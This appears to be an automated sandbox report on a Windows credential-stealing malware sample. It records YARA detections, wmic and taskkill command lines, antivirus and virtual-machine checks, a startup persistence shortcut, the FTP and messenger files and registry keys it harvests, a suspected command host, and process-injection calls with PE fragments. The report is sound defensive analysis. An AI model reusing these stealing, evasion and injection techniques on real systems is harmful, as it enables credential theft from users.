Potentially malicious URLs were found in the process memory dump (4 events)

url	http://www.nirsoft.net/
url	http://www.imvu.com
url	https://www.google.com
url	http://www.ebuddy.com

Yara rule detected in process memory (50 out of 78 events)

description	Communications PWS network	rule	PWS_CnC_memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vba
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	email clients info stealer	rule	infoStealer_emailClients_Zero
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications PWS network	rule	PWS_CnC_memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vba
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	Escalate priviledges	rule	Escalate_priviledges
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications PWS network	rule	PWS_CnC_memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg

Queries for potentially installed applications (50 out of 155 events)

Time & API	Arguments	Status
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW June 29, 2021, 1:50 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1

Terminates another process (10 events)

Time & API	Arguments	Status
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000000 process_identifier: 2164 process_handle: 0x0000006c
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000000 process_identifier: 2164 process_handle: 0x0000006c	1
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000000 process_identifier: 1748 process_handle: 0x00000068
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000000 process_identifier: 1748 process_handle: 0x00000068	1
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000001 process_identifier: 1052 process_handle: 0x00000190
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000001 process_identifier: 1052 process_handle: 0x00000190	1
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000001 process_identifier: 2728 process_handle: 0x00000188
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000001 process_identifier: 2728 process_handle: 0x00000188	1
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000001 process_identifier: 540 process_handle: 0x0000018c
NtTerminateProcess June 29, 2021, 1:51 p.m.	status_code: 0x00000001 process_identifier: 540 process_handle: 0x0000018c	1

Uses Windows utilities for basic Windows functionality (12 events)

cmdline	"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
cmdline	"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
cmdline	"taskkill" /PID 2060 /F
cmdline	"wmic" path win32_VideoController get caption /FORMAT:List
cmdline	"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
cmdline	"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
cmdline	"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
cmdline	"taskkill" /PID 540 /F
cmdline	"wmic" os get caption /FORMAT:List
cmdline	"taskkill" /PID 1812 /F
cmdline	"taskkill" /PID 1052 /F
cmdline	"taskkill" /PID 2728 /F

Executes one or more WMI queries which can be used to identify virtual machines (2 events)

wmi	SELECT VolumeName FROM Win32_LogicalDisk WHERE DriveType=4
wmi	SELECT IPAddress FROM win32_NetworkAdapterConfiguration WHERE IPEnabled=1

One or more of the buffers contains an embedded PE file (3 events)

buffer	Buffer with sha1: 89fc2d252ac53711f2d60c94a18359204238054c
buffer	Buffer with sha1: fa1df6ac8528661c206e651eff4f77dfa7215a0f
buffer	Buffer with sha1: 23baea5066492c457b28db9199bfff06d62d8131

Communicates with host for which no DNS query was performed (1 event)

host

34.227.13.244

Allocates execute permission to another process indicative of possible code injection (8 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 2988 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000039c	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 2128 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a4	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1836 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003c8	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1080 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000036c	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 2060 region_size: 77824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000368	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1052 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003d0	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1812 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003dc	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 2728 region_size: 200704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003e4	1

Installs itself for autorun at Windows startup (1 event)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeCPS.lnk

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\FTP Explorer\profiles.xml
file	C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml

Executes one or more WMI queries (12 events)

wmi	SELECT StatusCode FROM win32_PingStatus WHERE address='diamond.serivice.com'
wmi	SELECT displayName FROM AntiVirusProduct
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2728)
wmi	SELECT IPAddress FROM win32_NetworkAdapterConfiguration WHERE IPEnabled=1
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1812)
wmi	SELECT ResponseTime FROM win32_PingStatus WHERE address='diamond.serivice.com'
wmi	SELECT Caption FROM win32_VideoController
wmi	SELECT VolumeName FROM Win32_LogicalDisk WHERE DriveType=4
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 540)
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1052)
wmi	SELECT caption FROM Win32_OperatingSystem
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2060)

Harvests information related to installed instant messenger clients (5 events)

file	C:\Users\test22\AppData\Roaming\Digsby\digsby.dat
file	C:\Users\test22\AppData\Roaming\MySpace\IM\users.txt
registry	HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
registry	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
registry	HKEY_CURRENT_USER\Software\Paltalk

Potential code injection by writing to the memory of another process (22 events)

Time & API	Arguments	Status	Return
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $³Lî¨÷-û÷-û÷-û4"ßûõ-û4"Ýûá-û Àûü-û-ûü-û÷-û§,û ûô-ûÐëòûÍ-ûÐëüûö-ûÐëøûö-ûRich÷-ûPEL´Ë^àÐJôfà@Àáµlvð0 äàl.textJÏÐ `.rdataÊà®Ô@@.dataä@À.rsrc0@@ base_address: 0x00400000 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $·ÛósiósiósildòsiRichósiPEL=/`àt0@PÇb'(@( 0.text `.dataÈ0@À.rsrc@@@¼ç¨^MSVBVM60.DLL base_address: 0x00400000 process_identifier: 2128 process_handle: 0x000003a4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00404000 process_identifier: 2128 process_handle: 0x000003a4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2128 process_handle: 0x000003a4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $^ ¨kÆBkÆBkÆBÙdB kÆBàHBkÆBÀHÚBkÆBkÇB jÆBàHßBkÆB=´B/kÆB=ºBkÆB=¾BkÆBRichkÆBPEL»üiTà2¶>P@ øªÈð-ÀSP .textD12 `.rdataZP\6@@.data=°,@À.rsrc-ð.¾@@ base_address: 0x00400000 process_identifier: 1836 process_handle: 0x000003c8	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1836 process_handle: 0x000003c8	1	1
